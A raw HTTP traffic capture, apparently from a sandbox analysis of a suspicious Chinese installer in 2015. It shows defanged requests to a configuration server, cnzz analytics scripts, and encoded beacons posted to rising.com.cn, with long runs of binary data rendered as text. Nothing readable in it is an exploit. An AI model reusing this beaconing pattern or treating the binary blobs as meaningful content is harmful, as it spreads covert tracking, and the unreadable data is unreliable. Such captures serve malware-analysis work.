Rar!.....s..........Ert@.8............hB.`.F.3.. ...InStaller\bg_01.png...tg....L..YQ.U&..MXv.kUZ..V%...j.T...S*.poc\.^...}..B.......3.:\.I....d~.::!IA$H<|<...IiH....I....7....Kw...9.)m..........G...OjFFRRiotos..../..W.&.v..o.c.......x...{0....Et.d.19EHn .....3......$8z.....R...xzT.>..m.B$L:.R...1&.%...?//....).^./9B....r...Pc.HC.."H....[.......Q].{.....=.//....^.....A.3..E........A.d..I........3V.....................H...-.,.J.KXs...4.....%.RJB........!.....(d.aW.`..v.$.....N..Q...@g.dS..1).@21..@I*pL..6.f.....(......*..l3k...w....&..l.Eb...g..'...(.J...."..?..}.v....wk}..g?f..._Cy:.7N...X@P0..W>.....K..=k..]2.6..3N.....t..~[..S........!...x..)S....r)...i.f)............-U{A......V....).....G.. .X....z........U"t.7.eI.rl_......I$..t...5L*....e.;e..08DP..k.2..Y.X.........x04...r..86D.....<....c..A..................\...1|...JoO.Q~......e....Ot...BG.E...lo.N..l..@q..|>..w..0..H....D....q.D.!....D.IF./.$.0.*d.8.T!...Y.....'!....?(.\B_.O.M.I...z.O.!.....~'.u.1..Q}.R}.0~.....~.17.....&5..0.M./M.z..#...>W.6...p..p.D.t.4A{6...R...1.... ~.........JU.Qb/n.....k~XO%J.bT./....{].... .&.*`,..a.J)....P.&*..%.%..j..P.....HTTP/1.1 200 OK..Server: nginx..Date: Thu, 09 Jul 2015 03:09:59 GMT..Content-Type: image/png..Content-Length: 775012..Last-Modified: Tue, 02 Jun 2015 05:47:08 GMT..Connection: keep-alive..ETag: "556d435c-bd364"..Expires: Thu, 16 Jul 2015 03:09:59 GMT..Cache-Control: max-age=604800..X-Server-IP: 61.147.111.59..Accept-Ranges: bytes..Rar!.....s..........Ert@.8............hB.`.F.3.. ...InSta
<<< skipped >>>
GET /core.php?web_id=1255160857&t=z HTTP/1.1
Accept: */*
Referer: hXXp://config.0551fs.com/Public/config/xlxc/install_begin.html?567015
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 764
Connection: keep-alive
Date: Thu, 09 Jul 2015 03:10:29 GMT
Last-Modified: Thu, 09 Jul 2015 03:10:29 GMT
Expires: Thu, 09 Jul 2015 03:25:29 GMT
Via: cache21.l2de1[1524,200-0,M], cache55.l2de1[1536,0], cache7.de1[1536,200-0,M], cache4.de1[1537,0]
X-Cache: MISS TCP_REFRESH_MISS dirn:3:404373549
X-Swift-SaveTime: Thu, 09 Jul 2015 03:10:29 GMT
X-Swift-CacheTime: 900
!function(){var p,q,r,a=encodeURIComponent,b="1255160857",c="",d="",e="online_v3.php",f="z13.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b]["bobject"],l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k["callRequest"]([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k["createScriptIcon"](n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k["createIcon"]([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application/javascript..Content-Length: 764..Connection: keep-alive..Date: Thu, 09 Jul 2015 03:10:29 GMT..Last-Modified: Thu, 09 Jul 2015 03:10:29 GMT..Expires: Thu, 09 Jul 2015 03:25:29 GMT..Via: cache21.l2de1[1524,200-0,M], cache55.l2de1[1536,0], cache7.de1[1536,200-0,M], cache4.de1[1537,0]..X-Cache: MISS TCP_REFRESH_MISS dirn:3:404373549..X-Swift-SaveTime: Thu, 09 Jul 2015 03:10:29 GMT..X-Swift-CacheTime: 900..!function(){var p,q,r,a=encodeURIComponent,b="1255160857",c="",d="",e="online_v3.php",f="z13.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b]["bobject"],l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push
<<< skipped >>>
GET /z_stat.php?id=1255160857 HTTP/1.1
Accept: */*
Referer: hXXp://config.0551fs.com/Public/config/xlxc/install_begin.html?567015
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s11.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Date: Thu, 09 Jul 2015 03:10:26 GMT
Last-Modified: Thu, 09 Jul 2015 03:10:26 GMT
Cache-Control: max-age=5400,s-maxage=5400
Via: cache1.l2de1[3601,200-0,M], cache47.l2de1[3613,0], cache5.de1[3612,200-0,M], cache9.de1[3614,0]
X-Cache: MISS TCP_REFRESH_MISS dirn:7:449242244
X-Swift-SaveTime: Thu, 09 Jul 2015 03:10:26 GMT
X-Swift-CacheTime: 5400
296..(function(){function k(){this.c="1255160857";this.R="z";this.N="";this.K="";this.M="";this.r="1436411426";this.P="oz.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=1255160857");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=wind..2288..ow,f=encodeURIComponent,l=decodeURIComponent,n=unescape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),this.ga(),.this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.pa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},na:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},pa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.
<<< skipped >>>
GET /productstat/productStat.aspx?info=JVD5Mt0GKRdfSg9YaENEWhsAMAENEk0ROAINYj06CjFzBRgLZCIDYlkwEkh7EztVFyEdb1sgHzZlDi0tbFYAE00TPBcNEV9LaVUeF1hLaV0WVQIXLwBCHllRd1UBDV9Ud1wDBQQWZFUWSwQWLVhzZV5TbFYEFVlXHyEGFV9dalUDE1hValUDE1hValUDE00EOhFZTAUMPVgBF1tWal0ABQcENwINEllQa0NTTw8ELQANBRgROBFVHltDMBUNBRgLBhVCSh0MNQBXRlZUbkNDTTQVKwpeQgYAZFQABRgLBhVCTB8cKQANEU0WNzpRUQ4EZFUWUAU6OglZRgURNxBdHlpDKgtvTwIIMBENFk0HMAJFUw8ELQANE4k= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: cloud.rising.com.cn
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2enbz03lz411ep5541tucmjm; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2
okHTTP/1.1 200 OK..Date: Thu, 09 Jul 2015 03:10:53 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 2.0.50727..Set-Cookie: ASP.NET_SessionId=2enbz03lz411ep5541tucmjm; path=/; HttpOnly..Cache-Control: private..Content-Type: text/html; charset=utf-8..Content-Length: 2..ok..
GET /Public/conf/cpa/2/35_1_0_1_1/567015.xml HTTP/1.1
Host: config.0551fs.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:10:16 GMT
Content-Type: text/xml
Content-Length: 18440
Last-Modified: Thu, 09 Jul 2015 02:02:22 GMT
Connection: keep-alive
ETag: "559dd62e-4808"
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes
..._..O.K......&.......y.....{.".......g.........<..w .LL?.%./x@k.a..d....[....VsL....n=.........{SI.........,BzT.j.w...9X..5..6...x."......Q........=1=K...$.ZL6n;..R|.....?..G..Z..h.L@;.b.x.A....Ik.OK...$.ZL6n;..R|..-d...{BK...$.ZL...%pwX..{.,...F.x........qY...........d>..e..}........d:.X....kt..@T......MF...X.../....i.pMn.%....-.....j....|...S.......n.g%).(.E.(.}.|p{...Q h...-..@..~...w.xUr.M..@..~...w.0'....x.d.f.....\$-s$M....&.H..UA-......U.........s?......1....4q!{g...Y......s.%.....Rd'......l....}.U.{..g.._3......u...GK...3......u....<0.Yva...Z..h.h.J*P.>......A.i.......b..........7..B.Vtd?~..x..t..>..f..;.i.f..;..!)...-.:.S`=u.K...s.K...Y. ..L.py..U .....89.?:..M.5.. .f...Sg ....m..l1.....nE....k;........nE.....#y!...ed}\.NFE.. .V.#.D...|9.... .wiO..}.'.\e &.vo...y.%iYz....^.s..,k.%iYz.....t..].!G.]B a../|..7..K..9..."lEd. =.={m..a<.(.;.O..... ..c....jDN8.FC....[..S4S.60M..V9.#..I..b.c..$......"c...J..@... ..c....|....q.D..?R.......T9....\.V~..u............V.2.D..'.~)..zj..Ep...9|.*.q@..8..m%r^5.y......1.=..I.'.)o3..t..Z.......r.D.xoe.a.]{.l6..9.~t.@.;(.({.........q_...R...Z%...U......e.x....T&......../|..7..K..9..."l..&. U.|EkL..J..<...s.....!..-,.Z..d.....o..!...........k....w.M..&..]&....L...VN.L>..~...ar....{.6...;Jm...&.G....EG....../B.&..4......T..#B<.yD.A#.pX.....CG...].........3..la(......9T..A3o@.i..oP.[F..{.SG.%i..oP.[F...\4.V|...>$E.6.V.....w~ng..U.=U...7....$.EBIh'.g..`.iS....iQ..7>F.>.E.]..r......X...}.tZ]...a.......1....c...a..C.?...e.n...2$..C.?... ...
<<< skipped >>>
POST /register/minicenter/e/c.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: rsup10.rising.com.cn
Content-Length: 304
Connection: Keep-Alive
Cache-Control: no-cache
3Z/FQXWSEHFZUgkjSWkPGx47HTFOSgl4R3MNXhkzD3EVGU4ZLWYZDF9uXWEdfyhsXWcXClxpW2AfClxpW2AfClxpW3EDGU4pDCZGXU5gS3ENFUx4CjBbUAM0AjcNA0x4SX8PGxg7DHEVGU4oDiBwTg0uCDtwUAIpHzJDVU52SSBbXBx4UXMNCE52YlomMGVTS3MNSwkpHj9bG1Z6SSddTAl4R3MNXB4oBCFMVgg/SWkPG052S3FdXAE7GTgNA0x4Aj1cTQ02BzFKXgU0SX8PGxw7SWkPG052S3FfW05gS3ENRNs=
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 1
0HTTP/1.1 200 OK..Date: Thu, 09 Jul 2015 03:10:31 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 2.0.50727..Cache-Control: private..Content-Type: text/plain; charset=utf-8..Content-Length: 1..0....
POST /register/minicenter/e/c.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: rsup10.rising.com.cn
Content-Length: 308
Connection: Keep-Alive
Cache-Control: no-cache
94IGPMlISxITV11VEgpFHkpNRlIET10OHBBHW01FVBJfHBpvdgVTCQsYBgJXenwaBgRdDwgfAANVDwgfAANVDwgfABJJHBpfV0UMWBoWEBJHEBgOUVMRVVdCWVRHBhgOEhxFHkxNVxJfHBpeVUM6S1lYU1g6VVZfRFEJUBoAEkMRWUgOChBHCBoAOTlsNTElEBBHTl1fRVwRHgIMEkQXSV0OHBBHWUpeX0IGU1xJEgpFHhoAEBIXWVVNQltHBhgOdUgRTllPREMQX1tJQ0NHEBgOQFFHBhgOEhxFHkhOEgpFHhpRog==
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 1
0HTTP/1.1 200 OK..Date: Thu, 09 Jul 2015 03:10:37 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 2.0.50727..Cache-Control: private..Content-Type: text/plain; charset=utf-8..Content-Length: 1..0....
GET /Register/OnlineHelper/ForLog/ForLogDeve.aspx?Info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Connection: Keep-Alive
Host: rsup10.rising.com.cn
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 647
rsd..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="ForLogDeve.aspx?Info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSE XDCyUewEQk9pr9TKQlxLsgKQw==" />..</div>.. <div>.. .. </div>.. </form>..</body>..</html>....
GET /Public/conf/open/1/35_1_0_1_1/10.jpg HTTP/1.1
Host: config.0551fs.com
Accept:
Referer: hXXp://config.0551fs.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
Range: bytes=0-
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 09 Jul 2015 03:10:13 GMT
Content-Type: image/jpeg
Content-Length: 631
Last-Modified: Wed, 10 Jun 2015 07:17:28 GMT
Connection: keep-alive
ETag: "5577e488-277"
X-Server-IP: 61.147.111.59
Content-Range: bytes 0-630/631
......JFIF.....`.`.....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..S..(.....
GET /Public/conf/resource_donum.xml HTTP/1.1
Host: config.0551fs.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:10:18 GMT
Content-Type: text/xml
Content-Length: 4029
Last-Modified: Thu, 09 Jul 2015 03:05:01 GMT
Connection: keep-alive
ETag: "559de4dd-fbd"
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes
<?xml version="1.0" encoding="utf-8"?>.<root>.<time>201507090501</time>.<resource_donum>.<resource_1448>22</resource_1448>.<resource_58>13</resource_58>.<resource_1524>94</resource_1524>.<resource_1279>7</resource_1279>.<resource_11065>1</resource_11065>.<resource_574>4</resource_574>.<resource_1465>7665</resource_1465>.<resource_1093>33</resource_1093>.<resource_544>19</resource_544>.<resource_1216>5</resource_1216>.<resource_1470>10351</resource_1470>.<resource_2>2</resource_2>.<resource_1556>921</resource_1556>.<resource_16045>1</resource_16045>.<resource_840>118144</resource_840>.<resource_563>5</resource_563>.<resource_553>2</resource_553>.<resource_901>1</resource_901>.<resource_1020>1</resource_1020>.<resource_1280>3</resource_1280>.<resource_304>2</resource_304>.<resource_1460>2999</resource_1460>.<resource_487>1</resource_487>.<resource_1129>1</resource_1129>.<resource_1464>9081</resource_1464>.<resource_414>2</resource_414>.<resource_1304>85</resource_1304>.<resource_538>3</resource_538>.<resource_1471>76</resource_1471>.<resource_308>1</resource_308>.<resource_932>3</resource_932>.<resource_983>2<
<<< skipped >>>
GET /Public/conf/icon/2/35_1_0_1_1/567015.xml HTTP/1.1
Host: config.0551fs.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:10:20 GMT
Content-Type: text/xml
Content-Length: 1216
Last-Modified: Tue, 07 Jul 2015 11:15:33 GMT
Connection: keep-alive
ETag: "559bb4d5-4c0"
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes
..._..O.K......&.......y.....{.".......g.........<..w .L|.4W4..0.f.e.%..m.M...>.....X...b...5.;.Tf...l....<z...j:W]..a.....M;.....f.................. ..I.z.C ........C....;.)...re.......w...{N...<..(yUZ............C..6:.$...UZ............C..m9...8..^("......M....8.kD.B..O...O..63DKsNY|..P?.=...FT%...D!;....0T(!.,....d.....<.#."mI........D9R~.._...3hu. ..|..a...>.:7.........7>.@...D0M.s.CS....Zl.RQ.8...c ...G.1........z./.Y.E.o7...^w...d..&h...(Z......{..'.2.....K.....2i....u.x.b.a......JX.....#..}..c.{..k../o|.?.........../o|.?....kD.B..O.Nhu.p..va...Z..h.h.J*P.>......Av...4..T...~.x.G....7..B.Vtd?~..x..t..>..f..;.i.f..;..!)......~.w/"..FV..;.......@*.u.~._....P.q..q..!. ..7...... Wm.o`N.....7.D.S.....W .;...K........^.M.....}|=R|.w......;..(.....$-<...*.G2..WlCb.,..t.)e..#..n]..a.l...K....."G.....}.'.\e xc.m..O...D..5...Y.O.....K...@.....$ h)4....R..k. bO..4..i.1...c..W.....s.Jr.,..........s.Jr.,..U...T..{........\.._K9q.C._.`8.8.4....l.O.../-.?.9N...QxT....'Sx..6.1....h.......Z.r.v.`a........p.c..a..B......!.m.......q..SX...C.?...fgC:._..|xwH#..~..@F...:...t.pn...jk....".,.i.j...M...A.J....L...D........k._0.......F.8.n'.bR5........2 .n.7..k.......~<.S._".......X...w.[.W`.O..o.......Rw...i....OE...
GET /urg.asp?v=ravbase&t=rav&a= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: center.rising.com.cn
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 56
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQABTCDAC=KMDAHEECIOKINPNLCIEHLMNC; path=/
Cache-control: private
hXXp://rsup10.rising.com.cn/register/minicenter/e/c.aspxHTTP/1.1 200 OK..Date: Thu, 09 Jul 2015 03:10:29 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 56..Content-Type: text/html..Set-Cookie: ASPSESSIONIDQABTCDAC=KMDAHEECIOKINPNLCIEHLMNC; path=/..Cache-control: private..hXXp://rsup10.rising.com.cn/register/minicenter/e/c.aspx....
GET /urg.asp?v=ravbase&t=rav&a= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: center.rising.com.cn
Connection: Keep-Alive
Cookie: ASPSESSIONIDQABTCDAC=KMDAHEECIOKINPNLCIEHLMNC
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 56
Content-Type: text/html
Cache-control: private
hXXp://rsup10.rising.com.cn/register/minicenter/e/c.aspxHTTP/1.1 200 OK..Date: Thu, 09 Jul 2015 03:10:37 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 56..Content-Type: text/html..Cache-control: private..hXXp://rsup10.rising.com.cn/register/minicenter/e/c.aspx....
GET /LogCenter.asp?info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: center.rising.com.cn
Connection: Keep-Alive
Cookie: ASPSESSIONIDQABTCDAC=KMDAHEECIOKINPNLCIEHLMNC
HTTP/1.1 302 Object moved
Date: Thu, 09 Jul 2015 03:10:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: hXXp://rsup10.rising.com.cn/Register/OnlineHelper/ForLog/ForLogDeve.aspx?Info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ
Content-Length: 331
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://rsup10.rising.com.cn/Register/OnlineHelper/ForLog/ForLogDeve.aspx?Info=/nuXOl71IgRVEDt6LTRCRAdaHQBAQU9fWFxva1wfXFIYG1sbLyUaG10RWlEfHVoZWlEfHVoZWlEfHU9fW1wcCx8aVFEKW10UCltwRAdaHQBAQVgdWVIfFVkHDBlJCx8cVFEQ">here</a>.</body>.....
GET /urg.asp?v=ravbase&t=rav&a= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Rising)
Host: center.rising.com.cn
Connection: Keep-Alive
Cookie: ASPSESSIONIDQABTCDAC=KMDAHEECIOKINPNLCIEHLMNC
HTTP/1.1 200 OK
Date: Thu, 09 Jul 2015 03:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 56
Content-Type: text/html
Cache-control: private
hXXp://rsup10.rising.com.cn/register/minicenter/e/c.aspx..
GET /app.gif?&cna=JtQkDg0JWCICASU5EL3ZK3i7 HTTP/1.1
Accept: */*
Referer: hXXp://config.0551fs.com/Public/config/xlxc/install_begin.html?567015
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: pcookie.cnzz.com
HTTP/1.1 200 OK
Server: Tengine
Date: Thu, 09 Jul 2015 03:10:31 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=JtQkDg0JWCICASU5EL3ZK3i7; expires=Sun, 06-Jul-25 03:10:31 GMT; path=/; domain=.cnzz.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: Tengine..Date: Thu, 09 Jul 2015 03:10:31 GMT..Content-Type: image/gif..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=JtQkDg0JWCICASU5EL3ZK3i7; expires=Sun, 06-Jul-25 03:10:31 GMT; path=/; domain=.cnzz.com..Expires: Thu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cache..GIF89a.............!.......,...........L..;..
GET /Public/config/xlxc/install_begin.html?567015 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: config.0551fs.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:10:13 GMT
Content-Type: text/html
Content-Length: 329
Last-Modified: Wed, 20 May 2015 10:28:32 GMT
Connection: keep-alive
ETag: "555c61d0-149"
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes<script type="text/javascript">var cnzz_protocol = (("https:" ==
document.location.protocol) ? " hXXps://" : " hXXp://");document.writ
e(unescape("ipt src='" cnzz_protocol "s11.cnzz.com/z_stat.php?id=125516085
7' type='text/javascript'>
GET /Public/conf/c-lock/2/35_1_0_1_1/567015.xml HTTP/1.1
Host: config.0551fs.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jul 2015 03:10:15 GMT
Content-Type: text/xml
Content-Length: 4232
Last-Modified: Wed, 08 Jul 2015 07:44:09 GMT
Connection: keep-alive
ETag: "559cd4c9-1088"
X-Server-IP: 61.147.111.59
Accept-Ranges: bytes.h....N..KN ...M..n7.#...!..t[......7....Zh.....].W._..C.S."..V|..#..o>>
....R.R:..R...17.[.@.$.o.......JK...n7.#....)..vW....B....|.p....1J..S
"....].a..:7j[........R.R:..qE.0.J.|.....|.n.0 .%b.......H..~.{..../..
....:^.K?.e.........`).r...c.....n4[9!V~....~...X{|y....W?.Cqr.Z......
....p ..&S!.GB^W=...W....q.$.me...v3L..Y*.7.}I.)Q}. /!..HG..OYq....H..
.?dJTm...U,*Z...:...W?.Cqr..?..)...%6.jp%.....gM.#.'.N.z...RE...@...].
.....U..L.Jv:..n...gU.......^z..Z..... ..m...=...j.....9..0L=...W...\.
.N..<.?.. ..o..-. ...[..n7.#...!..t[...".h ..z.....;W..KO.~..).....
q.*r[... q..9........R.R:..k.b5........olD.V.yF....|`.8.T.==.,"....3.`
..... ...K'FM..|%....~.{..../[|f....YI.f.i......z..#...F....0..W?.Cqr.
.U..z.(...-..8....QU .............C.[......"v.0.>.<@PnIt.K]....Z
...Q.. .Jlr.z.bY .%&}>...o'.....s.....L.A...\=...IV&..E...<I...
.8...Cb...c......n7.#..YZX"E..V.R..%....Ti..........t.%..W?.Cqr.E.../.
A.f..2..#.'yA3.&..d....d.?v...L'|d...].0...n7.#...n.BU.l(.1v.(...EJ.,.
.Q9..P.n.?c21.....w=.,".....i..g.....?.y........L.{.:-s@.^.O....L..21.
....wm-w.,'}D...K...d.k @.c...<....pv..M...A...n7.#.....5..........
...(W. ....,L..$].........J.#.h.H....Q,..NB6...|d.........AK....l..0 .
